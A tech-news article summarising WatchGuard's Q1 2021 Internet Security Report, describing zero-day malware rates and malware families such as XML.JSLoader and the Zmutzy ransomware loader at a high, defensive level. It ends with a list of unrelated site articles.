How traditional malware systems are coming up short

New WatchGuard research reveals traditional anti-malware solutions miss nearly 75% of threats.

WatchGuard® Technologies’ latest Internet Security Report shows that 74% of threats detected last quarter were zero-day malware, capable of circumventing conventional signature-based antivirus solutions at the time of the malware release. The report also found that network attacks surged, with a 21% increase compared to the previous quarter and the highest volume since early 2018. With WatchGuard appliances detecting more than 4 million network attacks, corporate servers and assets on site are still high-value targets for attackers despite shifting to remote and hybrid work. 

“Last quarter saw the highest level of zero-day malware detections we’ve ever recorded. Evasive malware rates have eclipsed those of traditional threats, which is yet another sign that organisations need to evolve their defences to stay ahead of increasingly sophisticated threat actors,” said Corey Nachreiner, chief security officer at WatchGuard. “Traditional anti-malware solutions alone are insufficient for today’s threat environment. Every organisation needs a layered, proactive security strategy that involves machine learning and behavioural analysis to detect and block new and advanced threats.” 

Other key findings from WatchGuard’s Q1 2021 Internet Security Report reveal how attackers are trying to disguise and repurpose old exploits and the quarter’s top malware attacks.

· Fileless malware variant explodes in popularity 

XML.JSLoader is a malicious payload that appeared for the first time in WatchGuard’s top malware by volume and most widespread malware detection lists. It was also the variant WatchGuard detected most often via HTTPS inspection in Q1. The sample identified uses an XML external entity (XXE) attack to open a shell to run commands to bypass the local PowerShell execution policy and runs in a non-interactive way, hidden from the actual user or victim. This is another example of the rising prevalence of fileless malware and the need for advanced endpoint detection and response capabilities. 

· Simple file name trick helps hackers pass off ransomware loader as legitimate PDF attachments 

Ransomware loader Zmutzy surfaced as a top-two encrypted malware variant by volume in Q1. Associated with Nibiru ransomware specifically, victims encounter this threat as a zipped file attachment to an email or a download from a malicious website. Running the zip file downloads an executable, which to the victim appears to be a legitimate PDF. Attackers used a comma instead of a period in the file name and a manually adjusted icon to pass the malicious zip file off as a PDF. This type of attack highlights the importance of phishing education and training and implementing backup solutions in the event that a variant like this unleashes a ransomware infection. 

· Threat actors continue to attack IoT devices 

While it didn’t make WatchGuard’s top 10 malware list for Q1, the Linux.Ngioweb.B variant has been used by adversaries recently to target IoT devices. The first version of this sample targeted Linux servers running WordPress, arriving initially as an extended format language (EFL) file. Another version of this malware turns the IoT devices into a botnet with rotating command and control servers.

· An old directory traversal attack technique makes a comeback 

WatchGuard detected a new threat signature in Q1 that involves a directory traversal attack via cabinet (CAB) files, a Microsoft-designed archival format intended for lossless data compression and embedded digital certificates. A new addition to WatchGuard’s top 10 network attacks list, this exploit either tricks users into opening a malicious CAB file using conventional techniques, or by spoofing a network-connected printer to fool users into installing a printer driver via a compromised CAB file. 

· HAFNIUM zero-days provide lessons on threat tactics and response best practices 

Last quarter, Microsoft reported that adversaries used the four HAFNIUM vulnerabilities in various Exchange Server versions to gain full, unauthenticated system remote code execution and arbitrary file-write access to any unpatched server exposed to the Internet, as most email servers are. WatchGuard incident analysis dives into the vulnerabilities and highlights the importance of HTTPS inspection, timely patching and replacing legacy systems. 

· Attackers co-opt legitimate domains in crypto mining campaigns – In Q1, WatchGuard’s DNSWatch service blocked several compromised and outright malicious domains associated with crypto mining threats. Cryptominer malware has become increasingly popular due to recent price spikes in the cryptocurrency market and the ease with which threat actors can siphon resources from unsuspecting victims.

WatchGuard’s quarterly research reports are based on anonymised Firebox Feed data from active WatchGuard Fireboxes whose owners have opted in to share data to support the Threat Lab’s research efforts. In Q1, WatchGuard blocked a total of more than 17.2 million malware variants (461 per device) and nearly 4.2 million network threats (113 per device). The full report includes details on additional malware and network trends from Q1 2021, a detailed analysis of the HAFNIUM Microsoft Exchange Server exploits, critical defence tips for readers, and more. 

Read WatchGuard’s complete Q1 2021 Internet Security Report here

READ MORE:

About WatchGuard Technologies

WatchGuard® Technologies is a global leader in network security, secure Wi-Fi, multi-factor authentication, advanced endpoint protection, and network intelligence. The company’s award-winning products and services are trusted worldwide by nearly 18,000 security resellers and service providers to protect more than 250,000 customers. WatchGuard’s mission is to make enterprise-grade security accessible to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for midmarket businesses and distributed enterprises. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.

For more news from Top Business Tech, don’t forget to subscribe to our daily bulletin!

Follow us on LinkedIn and Twitter

Amber Donovan-Stevens

Amber is a Content Editor at Top Business Tech

Choose an AI solution to transform beyond technology

Kit Cox • 09th December 2024

The first step is knowing exactly what your business wants to achieve with AI; think faster, smarter and more efficient. Once you know what you are working towards, you can start looking for a solution that can help you make it a reality. AI integration can feel like a daunting task at the beginning, so...

A Roadmap to Security and Privacy Compliance

John Lynch Director of Kiteworks • 04th December 2024

Only by understanding the current regulatory environment and implementing robust data protection measures, can organisations enhance their security posture, ensure compliance, and build resilience against the latest cyber threats. This article provides a comprehensive roadmap of how to do it.

Data-Sharing Done Right: Finding the Best Business Approach

Bart Koek • 20th November 2024

To ensure data is not only available, but also accessible to those that need it, businesses recognise that it is vital to focus on collecting, sorting and governing all the data in their organisation. But what happens when data also needs to be accessed and shared across the business? That is where organisations discover a...

Nova: The Ultimate AI-Powered Martech Solution for Boosting Sales, Marketing...

Erin Lanahan • 19th November 2024

Discover how Nova, the AI-powered engine behind Launched, revolutionises Martech by automating sales and marketing tasks, enhancing personalisation, and delivering unmatched ROI. With advanced intent data integration, revenue attribution, and real-time insights, Nova empowers businesses to scale, streamline operations, and outperform competitors like 6Sense and 11x.ai. Experience the future of Martech with Nova’s transformative AI...

How E-commerce Marketers Can Win Black Friday

Sue Azari • 11th November 2024

As new global eCommerce players expand their influence across both European and US markets, traditional brands are navigating a rapidly shifting landscape. These fast-growing Asian platforms have gained traction by offering ultra-low prices, rapid product turnarounds, heavy investment in paid user acquisition, and leveraging viral social media trends to create demand almost in real-time. This...

Why microgrids are big news

Craig Tropea • 31st October 2024

As the world continues its march towards a greener future, businesses, communities, and individuals alike are all increasingly turning towards renewable energy sources to power their operations. What is most interesting, though, is how many of them are taking the pro-active position of researching, selecting, and implementing their preferred solutions without the assistance of traditional...

Is automation the silver bullet for customer retention?

Carter Busse • 22nd October 2024

CX innovation has accelerated rapidly since 2020, as business and consumer expectations evolved dramatically during the Covid-19 pandemic. Now, finding the best way to engage and respond to customers has become a top business priority and a key business challenge. Not only do customers expect the highest standard, but companies are prioritising superb CX to...